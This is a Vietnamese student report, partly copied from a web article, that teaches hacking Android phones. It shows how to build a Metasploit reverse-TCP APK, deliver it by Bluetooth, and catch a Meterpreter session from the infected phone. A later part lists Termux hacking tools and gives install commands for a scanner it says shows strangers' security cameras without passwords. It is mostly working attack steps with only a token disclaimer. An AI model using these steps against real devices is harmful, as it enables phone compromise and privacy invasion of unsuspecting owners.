3. Hack Android trên mạng LAN
3.2. Tạo APK có chứa mã độc bằng KaLi Linux
Trước khi tiến hành ta nên thiết lập phần Network như sau:
Vào VM => Settings... ở thanh lựa chọn của VMware. Tiếp theo, chọn Netword Adapter Bridged. Và lưu lại.
Hình 6.9. Setting VMware.
SVTT: Võ Đình Thông Page 46 Như vậy đã hoàn thành sơ bộ về cài đặt mạng cho máy ảo. Ta tiến hành tạo file APK chưa mã độc để đưa vào máy điện thoại Android.
Đầu tiên, ta vào máy ảo có cài sẵn Metasploit để lấy địa chỉ IP của máy ảo này. Ở đây, máy mình cài là máy WinXP, nên vào CMD, gõ lệnh ipconfig.
Ta thấy địa chỉ IP ở đây là 192.168.0.120
Hình 6.11. Lấy địa chỉ IP của máy cài Metasploit.
Tiếp theo, tại Terminal của KaLi Linux, gõ lệnh:
Msfpayload android/meterpreter/reverse_tcp lhost=192.168.0.120 lport=4444 R> /root/Desktop/Hack.app
SVTT: Võ Đình Thông Page 47 Với IP là địa chỉ IP của máy ảo cài Metasploit. Với lệnh trên, thì ta cần quan tâm 2 thông số lhost và lport. Sau khi lệnh này kết thúc, ta được file Hack.apk tại màn hình Desktop.
Như vậy, ta đã tạo ra file cài đặt cho Android chứa mã độc. Nhiệm vụ tiếp theo, là đưa mã độc này vào trong máy điện thoại có hệ điều hành Android. Nên nhớ, chỉ có thể hack được điện thoại có chung mạng LAN.
Ta tiến hành gửi file HACK.APK này vào điện thoại. Có nhiều cách, thì ở đây mình sẽ gửi Bluetooth.
Hình 6.13. Đưa file Hack.apk vào điện thoại Android.
Cộng việc tiếp theo của ta, là sẽ tạo một Handler xử lý dữ liệu truyền về, từ máy Android bị nhiễm mã độc. Ta vào Máy ảo đã cài Metasploit.
Khởi động Metasploit console bằng cách vào Stast > All Programs > Metasploit
> MetasploitConsole. Và gõ lệnh sau use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.0.120 – nhập địa chỉ IP giống với địa chỉ IP của máy ảo chứa Metasploit.
set port 4444– nhập port giống với port mà ta đã set khi tạo file Hack.apk.
SVTT: Võ Đình Thông Page 48
Hình 6.14. Tạo Handler xử lý thông tin.
Sau khi kết thúc câu lệnh. Ta có thể coi lại cách setup bằng cách gõ lệnh Show options. Nếu không có gì sai xót, thì ta kết thúc bằng lệnh RUN.
Hình 6.15. Run Handler.
Như vậy ta đã tạo thành công Handler để xử lý thông tin tại địa chỉ:
192.168.0.120:4444. Công việc bây giờ là vào máy Android đã được cài đặt mã
SVTT: Võ Đình Thông Page 49 Nếu xuất hiện như hình dưới đây, thì ta đã hoàn thành, cài đặt, và hack máy Android trên mạng LAN. Kiểm tra thông tin máy đã bị hack bằng lệnh Sysinfo.
Hình 6.16. Hack thành công điện thoại Android trên mạng LAN.
Ta đã tạo được kết nối tới máy điện thoại Android có địa chỉ IP:
192.168.0.117:42701 vào lúc 2014-08-09 10:09:35 +7000. Thông tin của điện thoại, với hệ điều hành: Linux 3.4.10 – gf33c859.
Thì ta thấy ở đây, địa chỉ IP của máy ảo và điện thoại Android chính là 2 địa chỉ cùng thuộc một mạng LAN 192.168.0.
Phần tiếp theo, của công việc là “dạo chơi” trên điện thoại đã nhiễm mã độc bằng Metasploit. Mình sẽ trình bày chi tiết hơn ở
Chương tiếp theo: Hack điện thoại thông qua VPS.
SVTT: Võ Đình Thông Page 50
XÂM NHẬP VÀO ANDROID THÔNG QUA
CHƯƠNG 7.
INTERNET TỪ VPS
Termux là ứng dụng trên Android giúp cài đặt tool Linux trên Github như Pentest Web, DDoS, bạn có tin không? Android là hệ điều hành thuộc nhân Linux, do đó bạn hoàn toàn có thể cài đặt các công cụ của Kali Linux lên điện thoại của mình. Hiện trên CHPlay có sẵn ứng dụng Termux là một công cụ có giao diện dòng lệnh. Termux tích hợp có đầy đủ các câu lệnh của Linux. Bạn có thể cài đặt các công cụ hack có giao diện dòng lệnh trên điện thoại Android của mình bằng Termux. Bài viết này sẽ hướng dẫn bạn cách cài đặt, sử dụng và giới thiệu các gói công cụ hacking bằng Termux để kiểm thử trên Android.
Termux là gì?
Termux là ứng dụng giả lập công cụ dòng lệnh trên Android có thể hoạt động trực tiếp mà không cần phải root hoặc cài đặt. Bạn có thể cài thêm các gói bổ sung có sẵn bằng trình quản lý gói APT. Kho ứng dụng APT Termux được lưu trữ bởi JFrog Bintray. Termux chỉ hoạt động trên Android 5.0 trở lên. Đặc điểm của ứng dụng này gồm:
- Hổ trợ bash and zsh shells.
- Chỉnh sửa file với nano và vim.
- Truy cập Server bằng ssh.
- Lập trình ngô ngữ C với clang, make và gdb.
- Hổ trợ Python
- Hổ trợ git và subversion.
- Hổ trợ Game trên nền tảng frotz.
Cách cài đặt
Để sử dụng các câu lệnh của Linux hoặc Kali Linux trên điện thoại Android bạn cần cài Termux. Ứng dụng này có sẵn trên CHPlay.
Download Termux
Các gói cần thiết nên cài đặt thêm:
Một số lưu ý:
- Khi gõ lệnh, có thể chữ sẽ không hiển thị trên màn hình. Bạn gõ xong cứ nhấn Enter là được]
- Trong quá trình cài đặt có hỏi yes/no thì bạn gõ y và nhấn Enter để tiếp tục cài đặt
Sau khi cài đặt xong, bạn mở ứng dụng Termux lên và gõ các câu lệnh sau để cài các ứng dụng cơ bản:
apt update && apt upgrade termux-setup-storage pkg install php pkg install git pkg install python2 pkg install curl
Có thể dùng Termux để Hack không?
Tất nhiên! Bạn có thể Hack với Termux đã cài trên điện thoại
Termux có sẵn một số công cụ có thể giúp bạn hack như
hydra hoặc nmap. Ứng dụng cũng cài sẵn các trình biên dịch [Clang, Rust, Go, v.v.] và các trình thông dịch [Bash, Perl, Python, v.v.]. Các công cụ kỹ thuật dịch ngược radare2. Termux cũng có thể chạy metasploit-framework cho phép bạn một số công cụ hack từ Kali Linux.
Các công cụ như aircrack-nghoặc tcpdumpnằm ở kho lưu trữ Termux Root bạn cần thủ công. Aircrack-ng yêu cầu chế độ wifi monitor [tính năng này ít có
trên các thiết bị android].
Danh sách các công cụ Hack được cài đặt sẵn trong Termux:
- Hydra
- Metasploit Framework
- Nmap
- Wireshark
- bettercap
- slowloris
- sqlmap
Lưu ý quan trọng: Bài viết này chỉ giới thiệu cách sử dụng Termux. Không khuyến kích sử dụng ứng dụng này để tấn công trái phép hệ thống không thuộc quyền sở hữu của bạn.
Cảnh báo: Có rất nhiều bài viết “hướng dẫn hack Termux” trên Internet cung cấp phần mềm không chính thống được sử dụng làm công cụ hack. Hầu hết trong số họ chỉ là clickbait và không thực sự hoạt động. Một số trong số họ buộc người dùng cài đặt phần mềm độc hại điện thoại. Nếu cài phần mềm không rõ nguồn gốc sẽ gây ra tình trạng mất dữ liệu, hư hỏng hệ điều hành Android của bạn.
Cách cài đặt các công cụ trên github để hack bằngTermux
Tool-X là bộ công cụ gồm 264 Tool Hack các thể loại. Bạn có thể cài đặt Tool-X để đơn giản quá trình cài đặt các công cụ Hack cho Termux hoặc cài các ứng dụng mà AnonyViet giới thiệu bên dưới.
Có 3 cách để cài đặt công cụ Hack trên Termux.
- Sử dụng git để tải trực tiếp các file từ github
- Dùng lệnh
apt-installđể cài Online - Tự tải các file cài đặt xuống sdcard của mình dùng lệnh
pkg install [tên gói cài]hoặcdpkg -i ./tên-gói-cài.deb
Cài NMAP – Công cụ quét IP, Port mạng
Nmap là một Công cụ quét port và thu thập thông tin về lỗi bảo mật mạng. Bạn có thể sử dụng nmap trong termux để quét các mục tiêu trên điện thoại di động của mình và bắt đầu cho các cuộc tấn công cơ bản. Cài đặt nmap trên termux bạn dùng lệnh:
pkg install nmap
Sẽ mất vài phút để cài đặt. Bạn có thể sử dụng nmap trên termux bằng cách nhập lệnh nmap trong termux. Một số lệnh nmap thông dụng:
- nmap IP. Ví dụ: nmap 192.168.1.1
- nmap host. Ví dụ nmap google.com
Cài RED HAWK – Công cụ thu thập thông tin
Red Hawk được sử dụng để Thu thập thông tin trang web như Tra cứu WHOIS, Tra cứu IP, xss, quét sqli, v.v.
Vì RED_HAWK chạy trên PHP nên bạn cần cài đặt môi trường PHP trước. Sử dụng lệnh:
pkg install php
Termux sẽ sử dụng một số dung lượng trên thiết bị của bạn chỉ cần gõ y để tiếp tục.
Bây giờ bạn cài đặt git. Đây là công cụ để tải trực tiếp các tập tin từ github hoặc bạn có thể tải xuống các tập lệnh, công cụ từ github hoặc các nguồn khác và sử dụng
pkg install git
Sau đó nhập lệnh trong termux
git clone //github.com/Tuhinshubhra/RED_HAWK.git
chmod +x RED_HAWK
cd RED_HAWK
chmod +x rhawk.php
Cuối cùng gõ lệnh này trong Termux để sử dụng
php rhawk.php
Bây giờ bạn có thể sử dụng RED HAWK để quét thông tin Website.
Cài Recondog – Quét lỗ hổng bảo mật
ReconDog cũng là một công cụ quét thu thập thông tin và tìm lỗ hổng bảo mật của Server.
Do Recondog được viết trên nền Python nên bạn phải cài Python trước. Dùng câu lệnh dưới đây:
pkg install python2
Sau đó tải regcongdog xuống và cài đặt:
git clone //github.com/UltimateHackers/ReconDog.git
cd ReconDog
chmod +x *
pip2 install -r requirements.txt
Chạy Regcongdog bằng lệnh: python2 dog
Bây giờ bạn sẽ có thể sử dụng ReconDog để quét lỗi bảo mật.
Cài IPCAM Scanner – xem Camera an ninh
IPCAM Scanner [IPACM] là danh sách cách Camera an ninh bị lộ thông tin. Bạn có thể truy cập trực tiếp để xem camera nhà người khác mà không cần Password.
Để tải dữ liệu Camera bạn tiến hành các bước sau:
pkg install python2
git clone //github.com/kancotdiq/ipcs.git
cd ipcs
pip2 install requests
python2 scan.py
Trong danh sách sẽ hiển thị các Quốc gia bạn muốn xem camera. Chọn Quốc gia -> Số Trang, sau đó sẽ hiển thị các IP Camera bị lộ thông tin đăng nhập.
Ngoài ra các công cụ ở trên, bạn có thể cài SQLMap để hack SQL Injection, các công cụ DDOS bằng Python…